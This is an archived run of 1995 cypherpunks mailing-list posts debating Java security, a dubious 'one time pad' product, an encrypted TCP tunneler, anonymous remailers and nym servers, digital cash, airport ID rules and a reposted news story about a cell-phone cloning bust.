Date: Sat, 21 Oct 95 19:19:38 PDT
To: cypherpunks@toad.com
Subject: Re: Sun speaks out - but not to the cypherpunks
Message-ID: <v02110101acaf51651ef9@[204.156.156.4]>
MIME-Version: 1.0
Content-Type: text/plain


Pardon the flame but I really have just about heard enough of this BS...

>This response came from Sun to Risks:
>
>> Date: Mon, 16 Oct 1995 21:22:40 -0700
>> From: Caveh.Jalali@eng.sun.com (Caveh Jalali)
>> Subject: Re: Risks in Java
>>
>> If we are going to "analyze" java security, let's keep in mind that there is
>> an important distinction between the language (java) and the machinery which
>> runs the java program.
>>
>> Java is a general-purpose programming language along the lines of C/C++.
>> So, there is no doubt that its expressive power overwhelms our
>> theoretician's abilities to predict java-programs behavior -- this is where
>> we start getting into the halting problem, computability and other black
>> magic.  Basically, i don't think we can "trust" programs written in any
>> *useful* programming language.
>
>Read: We can't trust Java programs.
>
>> The area where we can (must) build trust is the computing base.
>> Traditionally, this has been the OS, but in the case of java, it is the java
>> interpreter (such as netscape 2.0 and hotjava).  The browser is now the TCB
>> (trusted computer base) for all practical purposes...
>
>Read: The Java interpreter is supposed to be a TCB
>
>> And, to address the specific concern about applets spamming the net -- from
>> what I've seen, applets are only allowed to connect to the server that
>> supplied the applet in the first place (by default).  The worst thing one
>> could probably pull off is to spam oneself.
>
>Read: By default only - also note, none of this invalidates attacks 30-49
>from the previously posted list.
>
>Who here truly believes that the implementations of Java meet the
>requirements of a TCB?
>
>--
>-> See: Info-Sec Heaven at URL http://all.net
>Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236


Dr. Fred, you seem to spend a lot of engery slamming Java and HotJava. Are
you unaware that the HotJava Platform is the first generation pass at an
inline extensible GUI harness. Underline the total concept "extensible GUI
harness". This includes a series of tool functions to *help* perform secure
messeging (like those supplied iun Netscape 2.0/Java.), but because of the
enormity of the task and the number of facets on the face of this gem it
will be some time before the final versions of the first generation will be
available.

No one else had been working on this piece of technology before SMCC
started their effort. From the word floating about the SMCC labs they
didn't even know what they had.

So rather than slamming them, SMCC, or their PR folks for

   - releasing a version of a development tool far beyond what the "big boy's

   - doing what PR people do - Minimize and Maximize concepts in the press


I hope that you understand my point?. The net/net is that OLTP needs to be
scaleable to be a saleable commodity and without the ability to do
"java-ish" like local applets... There is no clean way to do this,
***period***. Also that OLTP requires transport level security, transaction
level security , and a whole lot of systems security and authtication. The
browser is the harness not the complete tool suite at this juncture.


As an aside - What blows my mind is the number of cycles people spend
bitching and moaning about Java itself rather than working to create a
better solution.

I just want to say "Get a clue. Moan about something that is important and
pertinent to the technologies at hand".


These comments are my own -

Sincereley,
Todd Glassey
todd@lgt.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ibg@oro.net
Date: Sat, 21 Oct 95 19:43:55 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199510220242.TAA09079@oro.net>
MIME-Version: 1.0
Content-Type: text/plain


Very interesting article on offshore banking. Can you suggest a reading list or 
source of additional information?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@omni.voicenet.com>
Date: Sat, 21 Oct 95 17:21:46 PDT
To: cypherpunks@toad.com
Subject: Re: "power one time pad"
In-Reply-To: <3087F1A2@mailer2>
Message-ID: <Pine.LNX.3.91.951021200919.452A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 20 Oct 1995, Paul Koning 1695 wrote:

> 
> I'd be interested in reactions to the article in Network World, 10/16/95 
> issue,
> page 53.  It describes a supposed cryptosystem that sounds bogus, but
> I can't make up my mind about how much is the system and how much is
> the confusion of the author.
I have heard a lot about the Elementrix POTP encryption algorithm.  I remain
skeptical of this algorithm until the source code is released.
 
> Among other things, it says that POTP "doesn't use an encryption algorithm;
> instead it synchronizes random processes on two computers as they
> communicate".  (I wonder if the author understands that that's just another
> way to describe encryption algorithms...)  
I don't believe this is an error caused by the author's ignorance of 
encryption.  I remember hearing the same exact thing about POTP "not using an
encryption algorithm" from one of the Elementrix spokespeople.

> The other claim is that it 
> eliminates
> the need to manage keys.  "... there is no need for central servers where 
> PGP
> keys ... are kept".
> 
> This seems like a strange claim because of course PGP doesn't require
> central servers, but more importantly, you can't do authentication without
> at least one piece of keying data being established out of band.  That
> could be a certification authority public key, but you need something
> to get started.
> 
> Supposedly this thing was shown at Interop.  Did anyone see it, and does
> the product make sense even if the article didn't?

I downloaded the secure email client for windoze and it seemed to make sense.
I might have misunderstood the documentation but it says that it has to
establish a "secure channel" with the other person by reciprocating emails with
what I would guess to be key synchronization data.  FYI, this client is  
available from the Elementrix FTP site at ftp.elementrix.com.
----------------------------------------------------------------
`finger -l markm@omni.voicenet.com` for public key and Geek Code
Public Key 1024-bit: 0xF9B22BA5
Fingerprint: BD 24 D0 8E 3C BB 53 47  20 54 FA 56 00 22 58 D5 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter F Cassidy <pcassidy@world.std.com>
Date: Sat, 21 Oct 95 17:26:50 PDT
To: sameer <sameer@c2.org>
Subject: Re: bernstein results?
In-Reply-To: <199510211856.LAA25175@infinity.c2.org>
Message-ID: <Pine.3.89.9510212005.B13024-0100000@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 21 Oct 1995, sameer wrote:

> 	So when do we find out what the judge had to say about the
> hearing on Friday?
> 


It's probably going to be continued. Civil suits involving the government 
six months just to engage - that is schedule them and get all the 
preliminary motions out of the way. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 21 Oct 95 20:54:59 PDT
To: mark@lochard.com.au (Mark)
Subject: Re: Encrypted TCP Tunneler
In-Reply-To: <199510220058.AA44534@junkers.lochard.com.au>
Message-ID: <199510220349.UAA04621@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	alpha.c2.org will soon start provided anonymous web page
services.  You can get normal webserver access (the alpha.c2.org web
pages will be very limited) through an anonymous shell account.

> 
> >I was toying with a limited form of this idea earlier, where outgoing
> >connections would be limited to http servers.  These are usually on a
> >small number of ports, although there are exceptions.  At least it
> >would be possible to filter out telnet and rlogin and such for that
> >application.  I don't think there are too many bad things you can do
> >just by connecting to httpd ports (probably I would be surprised,
> >though...).  But doing that would not make as much sense for the ETT
> >application.
> 
> A more cypherpunky type of application would be to enable anonymous
> httpd's so that your clients could advertise their nice/naughty products
> and be safe from location identification. If they had to pack up then
> they could move to another ISP and reconnect to the anon.net as normal.
> (Didnt I just read this in a spam HOWTO?)
> 
> The problem I see is when a LEA gets involved and snoops your wires and
> traces you back to your starting point and then traces the client that is
> supplying nasty httpd services. You wouldnt necessarily be aware of this
> occuring either.
> 
> Mark
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an407769@anon.penet.fi (jerry the golden retriever)
Date: Sat, 21 Oct 95 15:08:46 PDT
To: cypherpunks@toad.com
Subject: big bust
Message-ID: <9510212202.AA27572@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


Feds Bust Huge Cell Phone "Cloning" Ring
NEW YORK, NEW YORK, U.S.A., 1995 OCT 20 (NB) -- New York officials have
cracked what they call "the biggest illegal cellular telephone cloning
operation in the country" with the arrest of three individuals this week. If
convicted the suspects could receive up to 15 years in state prison.

"Cloning" is the process of retrieving the electronic serial numbers (ESNs)
of legitimate phones off the airwaves and programming the purloined numbers
into stolen phones. Thieves capture the numbers using special scanners placed
near busy highways and airports. ESNs can also be obtained from stolen
phones.

Denver-based Secret Service agent Bill Bresnahan told Newsbytes the Secret
Service is tasked with investigating cellular phone fraud, Bresnahan says
investigative techniques include monitoring cell activity for an unusually
high number of long distance calls, and the use of direction finding
equipment to track down the illicit phones while they are in operation.

US West spokesperson Wendy Carver-Herbert and Bresnahan say there are some
steps that cell phone users can employ to help foil phone theft or catch
thieves. They encourage cell phone users to step up the physical security
they provide their phones. "If you are going to leave your car with a parking
attendant or parked on the street for several days, remove the handset and
the antenna to avoid drawing attention," says Carver-Herbert. She also
recommends activating the electronic lock when you are away from the phone.

They also recommend monitoring your cell phone bill closely. If you see calls
you are sure you didn't place, contact your service provider immediately, and
if your phone is stolen the company can block calls from that number. US West
Cellular has programmed its computers to watch for anomalies in each
customer's calling pattern as another way to foil this high tech crime, and
the company employs security personnel to contact customers when calls fall
outside the normal pattern.

The New York raid seized cloning software, 46 cell phones and various
equipment including computers officials said contained legitimate cell phone
access numbers which when programmed into cloned phones allows the purchaser
to illegally use cellular service without paying. They often make expensive
long distance calls to other parts of the world.

Officials said as many as 27,000 phones have been cloned over the last seven
months and at least 3,000 usable legitimate access numbers were stored in the
computers seized in the raid. Authorities estimate losses from the latest
scam may have cost phone companies as much as $27 million. Cell phone service
providers lose an estimated $1.5 million a day nationwide because of phone
cloning. Authorities said it costs a thief about $50 to get a stolen cell
phone activated with a cloned number. The phone can then be sold on the
street for about $100.

The Manhattan District Attorney, Robert Morgenthau, was particularly
interested in this case. He said his own phone has been cloned twice by
thieves recently. The first time the bill exceeded $3,000 and the second time
more than $5,000 in calls were charged to his number. The legitimate holder
of the cell phone number that is cloned isn't aware the phone has been cloned
until the bill arrives.

In an attempt to stop losses cell service provider Bell Atlantic NYNEX Mobile
(NYSE: NYN) recently introduced the use of personal identification numbers,
which the company said has cut phone fraud by an estimated 80 percent. The
user punches in the unique PIN and presses the send button on the phone after
dialing the desired number. Authorities say the cellular phone industry
spends $5 million annually to stop sophisticated cellular phone fraud.

(Jim Mallory/19951020/Press contact: Kim Ancin, 914-365-7573, or Jim Gerace,
914-365-7712, both of NYNEX)
--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sat, 21 Oct 95 19:05:45 PDT
To: "Bob Bruen, MIT Lab for Nuclear Science" <BRUEN@mitlns.mit.edu>
Subject: Re: airport security
In-Reply-To: <951019071622.2000cf@mitlns.mit.edu>
Message-ID: <Pine.SV4.3.91.951021220213.17237G-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


WHy should airplane crashes be more of a cause for disseminating the 
Surveillance State than Greyhound Bus crashes?

I'd be more sympathetic to arguments about an airline's right to write 
it's contracts as it pleases. Though they are Common Carriers; they can't 
just offer Contracts of Adhesion at will.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 21 Oct 95 21:53:33 PDT
To: cypherpunks@toad.com
Subject: Reducing the Flames, Attacks, and Nit-Pickings
Message-ID: <acaf19a6520210049105@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:18 AM 10/22/95, Todd Glassey wrote:

>As an aside - What blows my mind is the number of cycles people spend
>bitching and moaning about Java itself rather than working to create a
>better solution.


The recent flames and attacks are pretty typical of mailing lists,
especially mailing lists having 1200 highly-opinionated subscribers
(gulp!). Not that I like the flames, but they're not the problem I want to
really talk about.

A trend that bothers me--and others too, from comments here--is the intense
"feeding frenzy" that is going on with each and every new product, from
Netscape, to Microsoft Network, to Java, to Digicash.

Don't get me wrong--finding flaws is a useful thing to do. But this list is
becoming _consumed_ by the _process_ of attacking products. Worse, many of
the attacks are by innuendo, by rumors and speculations about what features
a product has.

My comments will likely vanish without a trace, but I urge folks to hold
back a bit on jumping in with attacks and reports of problems. Be sure
something is _really_ a flaw before sounding the alarms.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 21 Oct 95 22:04:47 PDT
To: cypherpunks@toad.com
Subject: Re: airport security
Message-ID: <acaf1d35530210046717@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:05 AM 10/22/95, Alan Horowitz wrote:
>WHy should airplane crashes be more of a cause for disseminating the
>Surveillance State than Greyhound Bus crashes?
>
>I'd be more sympathetic to arguments about an airline's right to write
>it's contracts as it pleases. Though they are Common Carriers; they can't
>just offer Contracts of Adhesion at will.

No crypto relevance--my apologies.

I am skeptical that the "all passengers must have picture IDs" has much to
do with identifying corpses after crashes.

The recent push is certainly associated with the various terrorist threats
and incidents. The FAA can push for it, and the airlines have little to say
about it.

However, I read--probably in the WSJ--that the airlines see this as a
chance to regain control of "ticket abuse." Corporations often have bought
up discount tickets without knowing who willl be travelling and on what
dates. This allows them to have a pool of tickets and saves them a bunch of
money.

Reports are that many people showed up at boarding gates with a different
name than what the ticket said, and had to pay extra to get a current
ticket (no advance purchase, of course).

I'm not sure what the compelling lessons are, except that the
"Identification Required State" is getting closer every day.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Sun, 22 Oct 95 00:29:35 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Encrypted TCP Tunneler
In-Reply-To: <199510220102.SAA12922@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.951021233638.2645A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 21 Oct 1995, Hal wrote:

> This has a lot of potential uses.  It would be good if chaining were
> possible, although that requires the client to double-encrypt.  That way
> it can let people connect out without local snoopers seeing where they
> are connecting.  However for this to work it is necessary that the DNS
> lookup be done by the server rather than the client, and for the
> destination (to which the server is supposed to connect) to be passed
> encrypted.

Thanks for the suggestions.  These features have already been implemented.
WRT to anonymity, I plan to add link encryption after releasing the first 
version.

> It should be noted that SOCKS V5 has basically the functionality that Wei
> is describing, but I am not sure whether any implementations exist.  It
> also has some other features which might not be appropriate for
> this use.  The purpose of SOCKS is to tunnel through firewalls.

I believe that using SOCKS requires changes to the application.  This 
will not be necessary with ETT, although as a price the user will have to 
do more work.  It may be possible to write a SOCKS to ETT adapter program.

> Unfortunately there is a also huge misuse of this program, as a
> connection laundry for breakin attempts.  Hackers already go through
> layer after layer of broken accounts, etc. to make tracebacks
> difficult.  Read Stoll's "Cuckoo's Egg" for one account.  I think the
> Mitnick story is similar.  These packet laundries would be extremely
> inviting for this purpose.  The first time the ETT server is the base
> of a lot of breakin attempts to military installations there is going
> to be trouble.  SOCKS provides a config file for servers to limit what
> kinds of connections will be allowed, but it is hard to see how to
> filter out the bad guys while letting people go through who are
> using services for which they are authorized.

ETT will allow the server to filter based on both the client's public key 
and the destination address.  I'm not sure how to implement this yet, but 
I hope to come up with a filtering scheme that will be general enough to 
be useful for many applications.

> Even if you don't try to provide anonymity with this service I think it
> is still going to be a problem if breakins come from the server.  By
> the time the traceback is initiated it is going to be a pain to figure
> out where the connection was coming from.  The service would be similar
> in this context to providing free guest accounts to which you could
> telnet in and then telnet out.  I think any site which did this (some
> used to in the relaxed old days) would take a lot of heat today.

I completely agree with you.  I don't think there will be many free 
public accessable ETT servers, because of the above reasons.  Most ETT 
servers will probably be operated for private purposes.  Those that are 
not should either charge money to cover their expenses and risk, or allow 
connections to only a small range of addresses or ports.

Wei Dai






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 22 Oct 95 00:45:39 PDT
To: mark@lochard.com.au (Mark)
Subject: Re: Encrypted TCP Tunneler
In-Reply-To: <199510220457.AA22856@junkers.lochard.com.au>
Message-ID: <199510220738.AAA08907@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


A) Maintanence requests come in through the remailer network. Someone
tcp sniffing my incoming network would only see SMPT packets coming
froma remailer.) and the SMTP messages would be encrypted with
alpha.c2.org's key.

B) See (A)

C) We don't keep any information about the owners of anonymous
accounts. We will gladly give up any information we have given a
properly executed court order. The important fact though is that we
don't have the information that an LEA would need to find the person
publishing the materials that the LEA doesn't like.



	The anon shell accounts are more difficult to secure.


> 
> >alpha.c2.org will soon start provided anonymous web page
> >services.  You can get normal webserver access (the alpha.c2.org web
> >pages will be very limited) through an anonymous shell account.
> 
> >> A more cypherpunky type of application would be to enable anonymous
> >> httpd's so that your clients could advertise their nice/naughty products
> >> and be safe from location identification. If they had to pack up then
> >> they could move to another ISP and reconnect to the anon.net as normal.
> >> (Didnt I just read this in a spam HOWTO?)
> 
> >> The problem I see is when a LEA gets involved and snoops your wires and
> >> traces you back to your starting point and then traces the client that is
> >> supplying nasty httpd services. You wouldnt necessarily be aware of this
> >> occuring either.
> 
> How do you propose to protect entities wanting to utilise this function from
> 
> a) people sniffing the tcp packets coming in to discover who is maintaining
>    a web page,
> 
> b) the above LEA attack where your own lines are monitored and data is tracked
>    back thru the various networks to the web page maintainer?
> 
> c) an open LEA confrontation where they issue a warrant demanding any and all
>    info you have on the web page maintainer. (e.g. co$ doesnt like whats on
>    one of the pages)
> 
> The same again for the anon shell accounts.
> 
> Apart from a once off mailed to you via remailer, the creator of a web page
> needs to maintain their creations. This implies a means of accessing it that
> is repeatable. Wether thats via a dialup account or over the net, it can be
> traced. It's only when the entity uses channels outside of the jurisdiction
> or capabilities of those monitoring that some anonymity can be achieved.
> (Implies they weren't monitored entering the blinding channels in the first
> place).
> 
> Cheers,
> Mark
> mark@lochard.com.au
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tsuyoshi Hayashi <hayashi@scs.sony.co.jp>
Date: Sat, 21 Oct 95 13:54:42 PDT
To: Mats Bergstrom <asgaard@sos.sll.se>
Subject: Re: crypto export from the UK
In-Reply-To: <Pine.HPP.3.91.951019203347.12052A@cor.sos.sll.se>
Message-ID: <9510211725.AA19668@eagle.scs.sony.co.jp>
MIME-Version: 1.0
Content-Type: text/plain


Mr. Mats Bergstrom,

On Thu, 19 Oct 1995 20:50:07 +0100 (MET) you said:
 > According to the well researched list of various countries' crypto-laws
 > that Bert-Jaap Koops published on this list last July, the UK does not
 > have any laws against export of crypto. Here are some excerpts.
:
:
 > CRYPTO LAW SURVEY
 > Version July 1995
 > Bert-Jaap Koops (koops@kub.nl)
 > Please credit if quoting.
:
:
 > ----------------------------------------------------------------
 > SURVEY PER COUNTRY
 > 1. Export/ import regulations
 > 2. Other laws/regulations pertaining to encryption
 > 3. Threats/ intentions to regulate encryption
 > 4. Regulations stimulating encryption use
:
:
 > _COCOM_
 > 1. COCOM (Coordinating Committee for Multilateral Export Controls)
 > is an international organization (Japan, Australia, and all NATO

Thanks for your info about _United Kingdom_.  In addition
to it, tell me please about _Japan_ info if you can.

P.S.
Now I am match interested in crypto-related info about the
US and Japan.  Few weeks ago, I read articles on a Japanese
computer-related biz mag.:

 (1) a software company has imported RSA's BSAFE toolkit,
 (2) the US gov. has eased ITAR reg. off at last month.

If you have more info or more exact info, please tell me.
> all

Thanx.

# Note that I will take a week's holiday.  So I will not be
# able to reply for your mail even if you send me.  But I
# will reply when I will return to work.

- Tsuyoshi Hayashi <hayashi@scs.sony.co.jp>
-- Tech. div., Sony Computer Systems Inc.
--- # private: take@imasy.or.jp (read not frequently)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Sun, 22 Oct 95 01:46:23 PDT
To: cypherpunks@toad.com
Subject: Re: Reducing the Flames, Attacks, and Nit-Pickings
Message-ID: <199510220147.BAA17394@mailhost1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


It's good to see a real Californian fighting forest fires!

Love Always,

Carol Anne

>My comments will likely vanish without a trace, but I urge folks to hold
>back a bit on jumping in with attacks and reports of problems. Be sure
>something is _really_ a flaw before sounding the alarms.
>--Tim May
>Views here are not the views of my Internet Service Provider or Government.
>---------:---------:---------:---------:---------:---------:---------:----
>Timothy C. May              | Crypto Anarchy: encryption, digital money,
>tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
>Corralitos, CA              | knowledge, reputations, information markets,
>Higher Power: 2^756839      | black markets, collapse of governments.
>"National borders are just speed bumps on the information superhighway."
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sun, 22 Oct 95 06:10:54 PDT
To: cypherpunks@toad.com
Subject: S.F. judge to rule on encoding software
Message-ID: <308A41DC.603E@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


http://www.sfgate.com/net/abate/1021.html

  FYI.  The above URL points to a SF Examiner article about the
Bernstein case, including friday's proceedings.

        --Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@rand.org>
Date: Sun, 22 Oct 95 09:50:44 PDT
To: cypherpunks@toad.com
Subject: BlackNet in "Hardware"
Message-ID: <199510221650.JAA07758@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain


I just bought "Hardware" (Delacorte Press, 1995) by Linda Barnes, one of
my favorite mystery authors, and experienced a startled frisson when I saw
that at least a couple of subscribers had their work immortalized:
Tim's "Invitation to BlackNet" is the opening quote, and the date given is
for L.'s widespread Usenet spam of Feb '94.

No book report here, but it was as gripping as the rest of her efforts.
It's "about" people rather than computer hackery, but the computery bits
were done quite well.  Does an Amiga 2000 <really> have PC and Mac
compatibility options?  I don't know, and it doesn't matter anyway.

	Jim Gillogly
	1 Blotmath S.R. 1995, 16:48




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Sun, 22 Oct 95 09:55:24 PDT
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Anonymity: A Modest Proposal
Message-ID: <acb027040402100417fa@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

If you simply do not want to be a final hop, it is trivial to distinguish
final hops from intermediate hops in the chain. With cypherpunk remailers
you can scan for the remailer headers. With Mixmaster there is a completely
different format to the encrypted header (inside the encryption) for final
hops as opposed to intermediate hops.

I think one solution to this problem is to encourage (require) the use of
pseudonym servers. Having a server like alpha as the entity on the from
line has several advantages.

1) Less Spam since it takes some effort to set up the nym and it will be taken
away as soon as the spam starts.

2) The operator can take firm action. When people complain they want you to
punish the abuser. Typically they want you to pull the offenders account.
With a remailer there is no account to pull, but with a nym server it is
easy to kill the account, making the complainer happy.

3) The nym server could have a policy of only accepting messages encrypted
to it, and logging the address the message came from. If confronted, the
nym server could point to the last remailer in the chain. But that remailer
could not have known the contents of the message since it was encrypted to
the nym server.

If all nym servers were standardized to run from the same account name
(nymserve for example) the remailers could be configured to only deliver
final hops to addresses with that username.

        -Lance

>At 12:59 PM 10/19/95 -0400, Thomas Grant Edwards wrote:
>>This would require the remailer to examine entropy of messages passing
>>through.  Anything not random enough gets tossed.
>
>
>A simple entropy measuring algorithm:
>
<SNIP>
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMIp4yfPzr81BVjMVAQGjjAf+JWEiompiWc0VUnrwBPf8D6PYBi17aCFi
7h+zHiyoA2WXAT3Y/rDdBAKq4MI+Gg+7xs2YqmXKQPSd35UBL4UJAzNHtOEA2uo5
5XN83+9oZ6AJm6oVLmmm/vvv49Ts1VEOc4ANmqdQ0k5lHsNqFAte7eFk4aUlsiIi
+UUtUHc4zeXvr/T25TAEjGhB5b9DfwESYXPh1XkHBHiYCYIAsbadxGwAutVSUTWA
zPOiSRVSWZ+BY4H1FvnnDdoAMYE+AwpgR1iVinbNFcrjjEm+pYiWyS2FzMoQMv6N
2mZuuFQVGRJc6sSsdSsn35kz3sJg44s/mUnyq48uyJBOblv961SYZA==
=bo2F
-----END PGP SIGNATURE-----

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 22 Oct 95 10:16:44 PDT
To: cypherpunks@toad.com
Subject: Re: BlackNet in "Hardware"
Message-ID: <acafc92754021004cca0@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:50 PM 10/22/95, Jim Gillogly wrote:
>I just bought "Hardware" (Delacorte Press, 1995) by Linda Barnes, one of
>my favorite mystery authors, and experienced a startled frisson when I saw
>that at least a couple of subscribers had their work immortalized:
>Tim's "Invitation to BlackNet" is the opening quote, and the date given is
>for L.'s widespread Usenet spam of Feb '94.

Interesting. I'll pick up a copy today.

>No book report here, but it was as gripping as the rest of her efforts.
>It's "about" people rather than computer hackery, but the computery bits
>were done quite well.  Does an Amiga 2000 <really> have PC and Mac
>compatibility options?  I don't know, and it doesn't matter anyway.

I recollect that the Amiga had some gizmo--I think it was called
"MagicSack" or something like that--that let it run Macintosh programs,
sort of. It never really caught on, at least as an alternative to real
Macs. And I think something similar was available for DOS. This was all
several years back, before the Amiga faded out.

Amiga users and former Amiga users can probably tell us more.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Sun, 22 Oct 95 10:36:25 PDT
To: cypherpunks@toad.com
Subject: Mondex vs. Digicash (was: Godzilla vs. Mothra)
Message-ID: <v02120d02acb032401526@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



I disagree with Michael's assertion that Mondex will necessarily
win over Digicash. Here's why:

o The availability of Digicash in the US, for real, with spender
  anonymity, will be announced very soon; reporter activity on
  this subject is consistent with an embargoed press release for
  Monday or Tuesday. From posts to the list it's clear that a fully
  working system, ready for customers, will be announced.

o When doing market research on this subject, it became clear that
  low-value payments are largely going to be used for impulse
  purchases. If the Digicash system allows people to set up their
  accounts without getting out of their chairs (which I suspect will
  be the case, if they do it right), it will initially get more
  adopters.

o One or both systems could be found to have serious security problems;
  who knows what the outcome of their discovery & exploitation would be?
  I know at least one group of people who believe they have a good line
  on a serious security problem in Mondex.

o Even if the Mondex hardware were given away for free, think how
  much fun it is for the average user to add a new piece of hardware
  to their machines... ever install a sound card and CD-ROM drive on
  a PC? I remember reading something like 20% of all "multimedia"
  kits were returned, largely due to user install problems. If there
  is a competing method that costs the same and _doesn't_ require
  the hardware, people will tend go with this.

o In my conversations with state and federal regulators, it is clear
  that it _is_ possible to issue spender-anonymous e-cash. If you ask
  them, "Hey, can I create fully anonymous digital cash?", they go
  apeshit, but if you explain that the money uses existing (auditable)
  channels going in, and existing (auditable) channels going out, and
  that only spenders are anonymous, they relax considerably. They may
  change their minds later, but we're about to get an existence proof.

o It's not clear that _either_ system is going to win completely in
  the next 10+ years. Although there's been considerable shakeout in
  the last ten years, there is still a huge variety of non-electronic
  payment methods -- how can you be so sure that Mondex will win over
  Digicash, and that they won't co-exist like, say, money orders,
  currency and cashier's checks (three instruments with both similar
  and dissimilar attirbutes)?

Douglas Barnes
Electric Communities






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MDresser@aol.com
Date: Sun, 22 Oct 95 07:47:39 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Internet Flaws
Message-ID: <951022104651_50987142@emout05.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199510120347.UAA27336@infinity.c2.org>, sameer wrote:
> 
